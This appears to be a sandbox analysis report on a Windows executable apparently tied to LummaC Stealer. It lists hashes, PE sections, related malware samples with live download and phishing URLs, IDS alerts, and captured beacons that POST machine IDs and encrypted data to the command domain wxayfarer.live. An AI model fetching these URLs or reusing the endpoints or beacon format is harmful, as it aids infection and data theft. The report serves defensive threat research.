    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

    Time | Type | Description
    09:59:18 | API Interceptor | 33x Sleep call for process: ASIr1Bo2x9.exe modified
    Context: other samples associated with the same IP, domain or ASN (Associated Sample Name / URL | Detection | Threat Name | Context)

    Match: 176.113.115.7
    random.exe | malicious | Amadey, LummaC Stealer | 176.113.115.7/mine/random.exe
    6xdW3oRY63.exe | malicious | Amadey, DarkVision Rat, LummaC Stealer, Vidar | 176.113.115.7/mine/random.exe
    work.js | malicious | Amadey, LummaC Stealer, PureLog Stealer, Stealc, Vidar | 176.113.115.7/files/unique2/random.exe
    random.exe | malicious | Amadey, LummaC Stealer, Stealc, Xmrig | 176.113.115.7/files/crazytimeya/random.exe
    random.exe | malicious | Amadey | 176.113.115.7/files/qqdoup/random.exe
    VSAXXKuhCu.exe | malicious | Amadey, AsyncRAT | 176.113.115.7/files/unique2/random.exe
    L0erlgyZ6f.exe | malicious | Amadey, LummaC Stealer | 176.113.115.7/files/qqdoup/random.exe
    13s1HMkHKv.exe | malicious | Amadey, DarkVision Rat, Fallen Miner, LummaC Stealer | 176.113.115.7/files/2043702969/dx3hXS1.exe
    wJWNpO6lcm.exe | malicious | Amadey, GCleaner, LummaC Stealer | 176.113.115.7/files/unique2/random.exe
    download.php.exe.bin.exe | malicious | Amadey, DCRat, LummaC Stealer, PureLog Stealer, zgRAT | 176.113.115.7/mine/random.exe

    Match: 104.21.80.1
    invoice.exe | malicious | FormBook | www.mulher777.info/wtn0/
    Cv.exe | malicious | FormBook | www.mulher777.info/fowj/
    Arma Ferro - RFQ 987653411.exe | malicious | FormBook | www.dramavietsub.net/xn0a/?Fb=4ED9+CMUbnmN5pxC68fHf0LYHtaNT0e8IHhtvZswML/bPoiJGCaeeIZEe50hSvxGzg13paLMmRN6cIdy9lHXnMZwwK17WEvumNO+DXUvtZE5GG2E5PZaRt4=&Ft04=iDlT
    UW2025-020#U00b7pdf.vbs | malicious | FormBook, GuLoader | www.dramavietsub.net/rcu7/
    5047792048pdf.vbs | malicious | FormBook, GuLoader | www.dramavietsub.net/rcu7/?mbHTH=XRIXlKxnJVFUKEthJ4b1to75Xwh5Yc5hiRmvyKKqHzw4uge11MOII5dk9Gg7nuPf7mux8eELG7q95sMQ7MUe1hBR0dSMf0JiCewN4BGJ1X0IJ/mT1e/Enwc=&9j=Plml
    16Vzai4jwT.exe | malicious | CobaltStrike | cpvnxker.xyz/headimage.jpg
    MG710417.exe | malicious | Azorult | gd53.cfd/TL341/index.php
    PRI_VTK250419A.exe | malicious | Lokibot | touxzw.ir/scc1/five/fre.php
    DHL AWB Receipt_pdf.bat.exe | malicious | FormBook | www.rbopisalive.cyou/2dxw/
    Marzec 2025-faktura.pdf.exe | malicious | FormBook | www.oldpay.online/u023/?lneDc=2js00DxFGjY6gHlVOW1q9a10L3HzPIs7WpRmaT2A/LnakQk0VzYAjcxSKMUcEwKHsPPKaiHoQA==&NvExnX=FrapFFYPB

    Match: wxayfarer.live
    Qyk8RJnGN7.exe | malicious | LummaC Stealer | 104.21.112.1
    9GNLDc2CHH.exe | malicious | LummaC Stealer | 104.21.80.1
    jx22fssg2d.exe | malicious | LummaC Stealer | 104.21.16.1
    EUsF26UAMM.exe | malicious | LummaC Stealer | 104.21.16.1
    ZqkKpwG.exe | malicious | Unknown | 104.21.16.1
    random(3).exe | malicious | LummaC Stealer | 104.21.96.1
    random(9).exe | malicious | Amadey, CryptOne, LummaC Stealer, Socks5Systemz | 104.21.64.1
    ZqkKpwG.exe | malicious | Unknown | 104.21.16.1
    random.exe1.exe | malicious | LummaC Stealer | 104.21.32.1
    random.exe | malicious | Amadey, LummaC Stealer | 104.21.112.1

    Match: CLOUDFLARENETUS
    ySTYvI9Pvk.exe | malicious | LummaC Stealer | 104.21.25.9
    6aOM10d2pR.exe | malicious | LummaC Stealer | 172.67.182.237
    Ec0AgD2t1q.exe | malicious | DarkVision Rat | 172.67.68.246
    https://medpetroenergydmcc.com/court/ | malicious | HTMLPhisher | 104.21.16.1
    750413b4e6897a671bc759e04597952a0be747830189873b.xlsm.1.ps1 | malicious | LummaC Stealer | 104.21.96.1
    Review requested on PROJECT_PROPOSAL_Mutual_NDA_25.03.25_PDF (107Ko).msg | malicious | Unknown | 1.1.1.1
    Client-built.exe | malicious | Discord Rat | 162.159.136.234
    Discord rat.exe | malicious | Discord Rat | 162.159.134.234
    https://yousign.app/signatures/f4bc189e-eb94-419a-8c6d-f771bde372b3?s=801791fbcf262c5f0bb15f5752069a2688018a0dba6f5ec910fda8abdadc27ffa3bbd590e9689442d02c12f9e6c4e6ece12f7b0cf847c0521a88de6016075c39&r=34449ad686b12baff90ef39bb3be4334&source=email&lang=fr&magic_link_id=8e2d9b37-150d-4509-9a7a-10125e260c14&domain_id=b48fb217dc&k=zqvNTc7eaLGc3vUtOaMyEtccEILIqP1g | malicious | Unknown | 1.1.1.1
    https://x.to0wfnubykn8.ru/hjkewtr/hgjtyu.html | malicious | Unknown | 104.21.96.1

    Match: SELECTELRU
    Qyk8RJnGN7.exe | malicious | LummaC Stealer | 176.113.115.7
    nrKr2roAsG.exe | malicious | Amadey | 176.113.115.6
    9GNLDc2CHH.exe | malicious | LummaC Stealer | 176.113.115.7
    jx22fssg2d.exe | malicious | LummaC Stealer |
                                                • 176.113.115.7
                                                EUsF26UAMM.exeGet hashmaliciousLummaC StealerBrowse
                                                • 176.113.115.7
                                                JtH26qoxr2.exeGet hashmaliciousAmadeyBrowse
                                                • 176.113.115.6
                                                0Q6EWqWu4N.exeGet hashmaliciousAmadeyBrowse
                                                • 176.113.115.6
                                                C75q85Awi4.exeGet hashmaliciousAmadeyBrowse
                                                • 176.113.115.6
                                                5yCKVE324w.exeGet hashmaliciousAmadeyBrowse
                                                • 176.113.115.6
                                                6nsLmbufDq.exeGet hashmaliciousAmadeyBrowse
                                                • 176.113.115.6
                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                a0e9f5d64349fb13191bc781f81f42e1ySTYvI9Pvk.exeGet hashmaliciousLummaC StealerBrowse
                                                • 104.21.80.1
                                                6aOM10d2pR.exeGet hashmaliciousLummaC StealerBrowse
                                                • 104.21.80.1
                                                Ec0AgD2t1q.exeGet hashmaliciousDarkVision RatBrowse
                                                • 104.21.80.1
                                                750413b4e6897a671bc759e04597952a0be747830189873b.xlsm.1.ps1Get hashmaliciousLummaC StealerBrowse
                                                • 104.21.80.1
                                                quotation_1.xlsxGet hashmaliciousUnknownBrowse
                                                • 104.21.80.1
                                                Untitled_20250325.docx.docGet hashmaliciousUnknownBrowse
                                                • 104.21.80.1
                                                750413b4e6897a671bc759e04597952a0be747830189873b.bin.exeGet hashmaliciousLummaC StealerBrowse
                                                • 104.21.80.1
                                                Qyk8RJnGN7.exeGet hashmaliciousLummaC StealerBrowse
                                                • 104.21.80.1
                                                h2H2R15NDO.exeGet hashmaliciousLummaC StealerBrowse
                                                • 104.21.80.1
                                                m3gyyctL5A.exeGet hashmaliciousLummaC StealerBrowse
                                                • 104.21.80.1
                                                No context
                                                No created / dropped files found
File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 6.586487807042658
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: ASIr1Bo2x9.exe
File size: 2'990'592 bytes
MD5: f9915de2e2ca00d8d19a8d021b433926
SHA1: c01697bdad14b649af9616304f356fe04d0258d8
SHA256: f81ed393ec7b3eec60ef2b2d01b03468c38e968e1140ed060e80bdcd859be802
SHA512: 95f15a8c9224f58bb34d4b4e5165baf09dc42f166b47c943302e382298a6e1c120711e44db4a0d5c33f9236a6bcf547e7b71cde7f123465a87bc8ecdcae7bcd7
SSDEEP: 49152:Jg4R9lFlKwmW28Shg9MqRzllvOhP/+TqM:J39lFAwmWJSWKqNllmhA
TLSH: D8D54CE2B909B1CFE4DE67745527CE8A596D03B94B1088C3A8A8747E7E63CC115F7C28
File Content Preview: MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....T.g..............................0...........@...........................0......9....@.................................W...k..
Icon Hash: 90cececece8e8eb0
Entrypoint: 0x70c000
Entrypoint Section: .taggant
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp: 0x67E154E2 [Mon Mar 24 12:49:38 2025 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 6
OS Version Minor: 0
File Version Major: 6
File Version Minor: 0
Subsystem Version Major: 6
Subsystem Version Minor: 0
Import Hash: 2eabe9054cad5152567f0699947a2c5b
Data directories

Name                                 | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT         | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_IMPORT         | 0x61057         | 0x6b         | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE       | 0x60000         | 0x300        | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION      | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_SECURITY       | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_BASERELOC      | 0x611f8         | 0x8          | .idata
IMAGE_DIRECTORY_ENTRY_DEBUG          | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT      | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR      | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_TLS            | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG    | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT   | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_IAT            | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT   | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_RESERVED       | 0x0             | 0x0          |
Sections

Name     | Virtual Address | Virtual Size | Raw Size | MD5                              | Xored PE | ZLIB Complexity    | File Type            | Entropy            | Characteristics
         | 0x1000          | 0x5f000      | 0x2d800  | c243887783b30ea2200c7e8e1c85ec96 | False    | 0.9980898008241759 | data                 | 7.9841832142391    | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc    | 0x60000         | 0x300        | 0x200    | 993ddf49a89aa517a1a6e2d5ed4882ae | False    | 0.869140625        | data                 | 6.5071606312298025 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata   | 0x61000         | 0x1000       | 0x200    | f47b289bcee0e13a937cc29db13607bf | False    | 0.150390625        | data                 | 1.0437720338377494 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
cwkdpops | 0x62000         | 0x2a9000     | 0x2a8e00 | 58866b02985cb124a6f2ec57c8d607dc | unknown  | unknown            | unknown              | unknown            | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
sifugpmh | 0x30b000        | 0x1000       | 0x600    | 49b3b76f0164553e2cb8d9caa9709a7c | False    | 0.5787760416666666 | data                 | 4.962743501804128  | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant | 0x30c000        | 0x3000       | 0x2200   | b322131e6dfe9ce74cc5381d431fb6af | False    | 0.0642233455882353 | DOS executable (COM) | 0.6917303992715064 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Resources

Name        | RVA      | Size  | Type                         | Language | Country | ZLIB Complexity
RT_MANIFEST | 0x30aab0 | 0x2a5 | XML 1.0 document, ASCII text |          |         | 0.4963072378138848

Imports

DLL          | Import
kernel32.dll | lstrcpy


IDS alerts

Timestamp                       | SID     | Signature                                                  | Severity | Source IP   | Source Port | Dest IP     | Dest Port | Protocol
2025-03-25T14:59:18.501983+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update  | 3        | 192.168.2.4 | 49723       | 104.21.80.1 | 443       | TCP
2025-03-25T14:59:21.115173+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update  | 3        | 192.168.2.4 | 49724       | 104.21.80.1 | 443       | TCP
2025-03-25T14:59:23.183594+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update  | 3        | 192.168.2.4 | 49725       | 104.21.80.1 | 443       | TCP
2025-03-25T14:59:24.583046+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update  | 3        | 192.168.2.4 | 49726       | 104.21.80.1 | 443       | TCP
2025-03-25T14:59:27.097605+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update  | 3        | 192.168.2.4 | 49727       | 104.21.80.1 | 443       | TCP
2025-03-25T14:59:28.417307+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update  | 3        | 192.168.2.4 | 49728       | 104.21.80.1 | 443       | TCP
2025-03-25T14:59:30.257214+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update  | 3        | 192.168.2.4 | 49729       | 104.21.80.1 | 443       | TCP
                                                • Total Packets: 104
                                                • 443 (HTTPS)
                                                • 80 (HTTP)
                                                • 53 (DNS)
TCP packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                Mar 25, 2025 14:59:26.883219004 CET44349727104.21.80.1192.168.2.4
                                                Mar 25, 2025 14:59:26.883307934 CET49727443192.168.2.4104.21.80.1
                                                Mar 25, 2025 14:59:26.883662939 CET49727443192.168.2.4104.21.80.1
                                                Mar 25, 2025 14:59:26.883673906 CET44349727104.21.80.1192.168.2.4
                                                Mar 25, 2025 14:59:27.097449064 CET44349727104.21.80.1192.168.2.4
                                                Mar 25, 2025 14:59:27.097604990 CET49727443192.168.2.4104.21.80.1
                                                Mar 25, 2025 14:59:27.099026918 CET49727443192.168.2.4104.21.80.1
                                                Mar 25, 2025 14:59:27.099039078 CET44349727104.21.80.1192.168.2.4
                                                Mar 25, 2025 14:59:27.099414110 CET44349727104.21.80.1192.168.2.4
                                                Mar 25, 2025 14:59:27.100745916 CET49727443192.168.2.4104.21.80.1
                                                Mar 25, 2025 14:59:27.100858927 CET49727443192.168.2.4104.21.80.1
                                                Mar 25, 2025 14:59:27.100907087 CET44349727104.21.80.1192.168.2.4
                                                Mar 25, 2025 14:59:27.640465975 CET44349727104.21.80.1192.168.2.4
                                                Mar 25, 2025 14:59:27.640599966 CET44349727104.21.80.1192.168.2.4
                                                Mar 25, 2025 14:59:27.640682936 CET49727443192.168.2.4104.21.80.1
                                                Mar 25, 2025 14:59:27.640908003 CET49727443192.168.2.4104.21.80.1
                                                Mar 25, 2025 14:59:27.640927076 CET44349727104.21.80.1192.168.2.4
                                                Mar 25, 2025 14:59:28.199148893 CET49728443192.168.2.4104.21.80.1
                                                Mar 25, 2025 14:59:28.199209929 CET44349728104.21.80.1192.168.2.4
                                                Mar 25, 2025 14:59:28.199299097 CET49728443192.168.2.4104.21.80.1
                                                Mar 25, 2025 14:59:28.199665070 CET49728443192.168.2.4104.21.80.1
                                                Mar 25, 2025 14:59:28.199676991 CET44349728104.21.80.1192.168.2.4
                                                Mar 25, 2025 14:59:28.417028904 CET44349728104.21.80.1192.168.2.4
                                                Mar 25, 2025 14:59:28.417306900 CET49728443192.168.2.4104.21.80.1
                                                Mar 25, 2025 14:59:28.418452978 CET49728443192.168.2.4104.21.80.1
                                                Mar 25, 2025 14:59:28.418472052 CET44349728104.21.80.1192.168.2.4
                                                Mar 25, 2025 14:59:28.418802023 CET44349728104.21.80.1192.168.2.4
                                                Mar 25, 2025 14:59:28.420105934 CET49728443192.168.2.4104.21.80.1
                                                Mar 25, 2025 14:59:28.420874119 CET49728443192.168.2.4104.21.80.1
                                                Mar 25, 2025 14:59:28.420914888 CET44349728104.21.80.1192.168.2.4
                                                Mar 25, 2025 14:59:28.421034098 CET49728443192.168.2.4104.21.80.1
                                                Mar 25, 2025 14:59:28.421066046 CET44349728104.21.80.1192.168.2.4
                                                Mar 25, 2025 14:59:28.421195984 CET49728443192.168.2.4104.21.80.1
                                                Mar 25, 2025 14:59:28.421238899 CET44349728104.21.80.1192.168.2.4
                                                Mar 25, 2025 14:59:28.421366930 CET49728443192.168.2.4104.21.80.1
                                                Mar 25, 2025 14:59:28.421401024 CET44349728104.21.80.1192.168.2.4
                                                Mar 25, 2025 14:59:28.421546936 CET49728443192.168.2.4104.21.80.1
                                                Mar 25, 2025 14:59:28.421575069 CET44349728104.21.80.1192.168.2.4
                                                Mar 25, 2025 14:59:28.421730995 CET49728443192.168.2.4104.21.80.1
                                                Mar 25, 2025 14:59:28.421768904 CET44349728104.21.80.1192.168.2.4
                                                Mar 25, 2025 14:59:28.421780109 CET49728443192.168.2.4104.21.80.1
                                                Mar 25, 2025 14:59:28.421948910 CET49728443192.168.2.4104.21.80.1
                                                Mar 25, 2025 14:59:28.421998978 CET49728443192.168.2.4104.21.80.1
                                                Mar 25, 2025 14:59:28.464283943 CET44349728104.21.80.1192.168.2.4
                                                Mar 25, 2025 14:59:28.464590073 CET49728443192.168.2.4104.21.80.1
                                                Mar 25, 2025 14:59:28.464669943 CET49728443192.168.2.4104.21.80.1
                                                Mar 25, 2025 14:59:28.464689016 CET49728443192.168.2.4104.21.80.1
                                                Mar 25, 2025 14:59:28.508271933 CET44349728104.21.80.1192.168.2.4
                                                Mar 25, 2025 14:59:28.508635044 CET49728443192.168.2.4104.21.80.1
                                                Mar 25, 2025 14:59:28.508773088 CET49728443192.168.2.4104.21.80.1
                                                Mar 25, 2025 14:59:28.508836985 CET49728443192.168.2.4104.21.80.1
                                                Mar 25, 2025 14:59:28.552277088 CET44349728104.21.80.1192.168.2.4
                                                Mar 25, 2025 14:59:28.552438021 CET49728443192.168.2.4104.21.80.1
                                                Mar 25, 2025 14:59:28.596318960 CET44349728104.21.80.1192.168.2.4
                                                Mar 25, 2025 14:59:28.734894037 CET44349728104.21.80.1192.168.2.4
                                                Mar 25, 2025 14:59:29.987850904 CET44349728104.21.80.1192.168.2.4
                                                Mar 25, 2025 14:59:29.987992048 CET44349728104.21.80.1192.168.2.4
                                                Mar 25, 2025 14:59:29.988199949 CET49728443192.168.2.4104.21.80.1
                                                Mar 25, 2025 14:59:29.988231897 CET49728443192.168.2.4104.21.80.1
                                                Mar 25, 2025 14:59:30.034193993 CET49729443192.168.2.4104.21.80.1
                                                Mar 25, 2025 14:59:30.034245014 CET44349729104.21.80.1192.168.2.4
                                                Mar 25, 2025 14:59:30.034553051 CET49729443192.168.2.4104.21.80.1
                                                Mar 25, 2025 14:59:30.034926891 CET49729443192.168.2.4104.21.80.1
                                                Mar 25, 2025 14:59:30.034939051 CET44349729104.21.80.1192.168.2.4
                                                Mar 25, 2025 14:59:30.257097006 CET44349729104.21.80.1192.168.2.4
                                                Mar 25, 2025 14:59:30.257214069 CET49729443192.168.2.4104.21.80.1
                                                Mar 25, 2025 14:59:30.258526087 CET49729443192.168.2.4104.21.80.1
                                                Mar 25, 2025 14:59:30.258542061 CET44349729104.21.80.1192.168.2.4
                                                Mar 25, 2025 14:59:30.258903027 CET44349729104.21.80.1192.168.2.4
                                                Mar 25, 2025 14:59:30.261240959 CET49729443192.168.2.4104.21.80.1
                                                Mar 25, 2025 14:59:30.261302948 CET49729443192.168.2.4104.21.80.1
                                                Mar 25, 2025 14:59:30.261329889 CET44349729104.21.80.1192.168.2.4
                                                Mar 25, 2025 14:59:30.914897919 CET44349729104.21.80.1192.168.2.4
                                                Mar 25, 2025 14:59:30.915075064 CET44349729104.21.80.1192.168.2.4
                                                Mar 25, 2025 14:59:30.915443897 CET49729443192.168.2.4104.21.80.1
                                                Mar 25, 2025 14:59:30.920742035 CET49729443192.168.2.4104.21.80.1
                                                Mar 25, 2025 14:59:30.920763016 CET44349729104.21.80.1192.168.2.4
                                                Mar 25, 2025 14:59:30.920808077 CET49729443192.168.2.4104.21.80.1
                                                Mar 25, 2025 14:59:30.920815945 CET44349729104.21.80.1192.168.2.4
                                                Mar 25, 2025 14:59:30.930593967 CET4973080192.168.2.4176.113.115.7
                                                Mar 25, 2025 14:59:31.931042910 CET4973080192.168.2.4176.113.115.7
                                                Mar 25, 2025 14:59:33.946698904 CET4973080192.168.2.4176.113.115.7
                                                Mar 25, 2025 14:59:37.946762085 CET4973080192.168.2.4176.113.115.7
                                                Mar 25, 2025 14:59:45.946733952 CET4973080192.168.2.4176.113.115.7
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Mar 25, 2025 14:59:18.077423096 CET | 63074 | 53 | 192.168.2.4 | 1.1.1.1
Mar 25, 2025 14:59:18.228065014 CET | 53 | 63074 | 1.1.1.1 | 192.168.2.4

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Mar 25, 2025 14:59:18.077423096 CET | 192.168.2.4 | 1.1.1.1 | 0x53fe | Standard query (0) | wxayfarer.live | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Mar 25, 2025 14:59:18.228065014 CET | 1.1.1.1 | 192.168.2.4 | 0x53fe | No error (0) | wxayfarer.live | | 104.21.80.1 | A (IP address) | IN (0x0001) | false
Mar 25, 2025 14:59:18.228065014 CET | 1.1.1.1 | 192.168.2.4 | 0x53fe | No error (0) | wxayfarer.live | | 104.21.112.1 | A (IP address) | IN (0x0001) | false
Mar 25, 2025 14:59:18.228065014 CET | 1.1.1.1 | 192.168.2.4 | 0x53fe | No error (0) | wxayfarer.live | | 104.21.96.1 | A (IP address) | IN (0x0001) | false
Mar 25, 2025 14:59:18.228065014 CET | 1.1.1.1 | 192.168.2.4 | 0x53fe | No error (0) | wxayfarer.live | | 104.21.32.1 | A (IP address) | IN (0x0001) | false
Mar 25, 2025 14:59:18.228065014 CET | 1.1.1.1 | 192.168.2.4 | 0x53fe | No error (0) | wxayfarer.live | | 104.21.64.1 | A (IP address) | IN (0x0001) | false
Mar 25, 2025 14:59:18.228065014 CET | 1.1.1.1 | 192.168.2.4 | 0x53fe | No error (0) | wxayfarer.live | | 104.21.16.1 | A (IP address) | IN (0x0001) | false
Mar 25, 2025 14:59:18.228065014 CET | 1.1.1.1 | 192.168.2.4 | 0x53fe | No error (0) | wxayfarer.live | | 104.21.48.1 | A (IP address) | IN (0x0001) | false
• wxayfarer.live

Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49723 | 104.21.80.1 | 443 | 7588 | C:\Users\user\Desktop\ASIr1Bo2x9.exe

Timestamp | Bytes transferred | Direction | Data
2025-03-25 13:59:18 UTC | 265 | OUT | POST /ALosnz HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
Content-Length: 51
Host: wxayfarer.live
2025-03-25 13:59:18 UTC | 51 | OUT | Data Raw: 75 69 64 3d 34 30 63 30 34 63 65 65 37 63 39 38 36 30 39 64 35 64 33 30 63 66 30 30 62 38 65 64 35 66 34 35 31 62 66 62 64 64 36 32 34 37 26 63 69 64 3d
Data Ascii: uid=40c04cee7c98609d5d30cf00b8ed5f451bfbdd6247&cid=
2025-03-25 13:59:19 UTC | 792 | IN | HTTP/1.1 200 OK
Date: Tue, 25 Mar 2025 13:59:18 GMT
Content-Type: application/octet-stream
Content-Length: 33672
Connection: close
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jN7iDt07%2BZztTfTlrtV%2FSmGwKqZVqFX%2FSWR4v%2F8J7TLSdCxf3sRcKOgXyBkQ3jaJMLm81TWoLdy9f%2BVwdp9nNBJ1uwgm58kXrsUxY2Hu0CUMCs6on5gTdBRLmZ8omnHmlA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 925eed95dc747d24-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=122818&min_rtt=118110&rtt_var=32040&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2833&recv_bytes=952&delivery_rate=28090&cwnd=227&unsent_bytes=0&cid=7d04b8e5686c4c08&ts=567&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49724 | 104.21.80.1 | 443 | 7588 | C:\Users\user\Desktop\ASIr1Bo2x9.exe

Timestamp | Bytes transferred | Direction | Data
2025-03-25 13:59:21 UTC | 273 | OUT | POST /ALosnz HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=9zdQGWOY
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
Content-Length: 19571
Host: wxayfarer.live
2025-03-25 13:59:21 UTC | 15331 | OUT | Data Raw: 2d 2d 39 7a 64 51 47 57 4f 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 69 64 22 0d 0a 0d 0a 34 30 63 30 34 63 65 65 37 63 39 38 36 30 39 64 35 64 33 30 63 66 30 30 62 38 65 64 35 66 34 35 31 62 66 62 64 64 36 32 34 37 0d 0a 2d 2d 39 7a 64 51 47 57 4f 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 39 7a 64 51 47 57 4f 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 41 44 33 35 30 45 39 34 41 33 39 44 46 42 37 33 38 30 31 35 45 33 30 45 35 45 34 35 38 39 39 0d
Data Ascii: --9zdQGWOYContent-Disposition: form-data; name="uid"40c04cee7c98609d5d30cf00b8ed5f451bfbdd6247--9zdQGWOYContent-Disposition: form-data; name="pid"2--9zdQGWOYContent-Disposition: form-data; name="hwid"CAD350E94A39DFB738015E30E5E45899
2025-03-25 13:59:21 UTC | 4240 | OUT | Data Raw: 23 e7 6c 67 38 b8 1c bd 2c e5 bf 77 50 ea b7 1d 82 1e d6 48 45 56 23 c1 81 c4 33 f6 ba a9 80 87 5c 37 6b db 04 0e 61 ef 5d ae 13 c2 6a 3b 78 d0 cb de 40 6f 59 5c 1c c8 94 2f 3b d5 01 35 53 6a f4 57 b3 8d 74 b4 60 44 5a f6 70 f3 2c c3 7d 3e 37 39 c0 24 bf 0e 5c c1 c5 0c 85 10 30 7e ea b9 1c 98 f7 2e f6 76 9f 40 76 01 90 95 02 be 8a d0 78 a8 59 d7 85 e8 8c be fe 36 ce 8e ae 72 df 33 d5 eb e1 5f c6 e6 6c 0f 8e dc d7 ad 40 7c 58 c3 11 39 34 b0 71 11 46 7d 95 cd f7 79 dd df 26 d7 52 44 3f a1 28 78 21 a7 14 94 b9 7f 25 e6 77 13 69 ec 20 c8 6a d8 f2 c5 d0 44 41 c1 19 2d 30 51 39 3e f0 0a 4b 10 d0 c6 ca 8b b3 f1 3e 4d bd 30 3b df 5c e7 f1 8e 96 1f bc 0e ec e5 54 a1 b6 de d8 f6 44 4b 9f 52 5f 83 92 7d 35 9b 84 50 9a 31 ef 4e 74 8e fa cf 01 ad d1 41 46 36 cb 2f 8b
Data Ascii: #lg8,wPHEV#3\7ka]j;x@oY\/;5SjWt`DZp,}>79$\0~.v@vxY6r3_l@|X94qF}y&RD?(x!%wi jDA-0Q9>K>M0;\TDKR_}5P1NtAF6/
2025-03-25 13:59:21 UTC | 814 | IN | HTTP/1.1 200 OK
Date: Tue, 25 Mar 2025 13:59:21 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Connection: close
Vary: Accept-Encoding
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8RYwJMf8Rf33FUu6kwIda3WVrtF7CA18GO0R%2Fn%2Bw5F9WawFF2vbg9ctqJ2Ef%2FkHzrmG4bNzZepJJa1cjmauPQh6PGswP4F3p%2Fv5cKnME7BS6bW67sLZLyfZNiva5uiWIcA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 925eeda54d911b58-EWR
alt-svc: h3=":443"; ma=86400
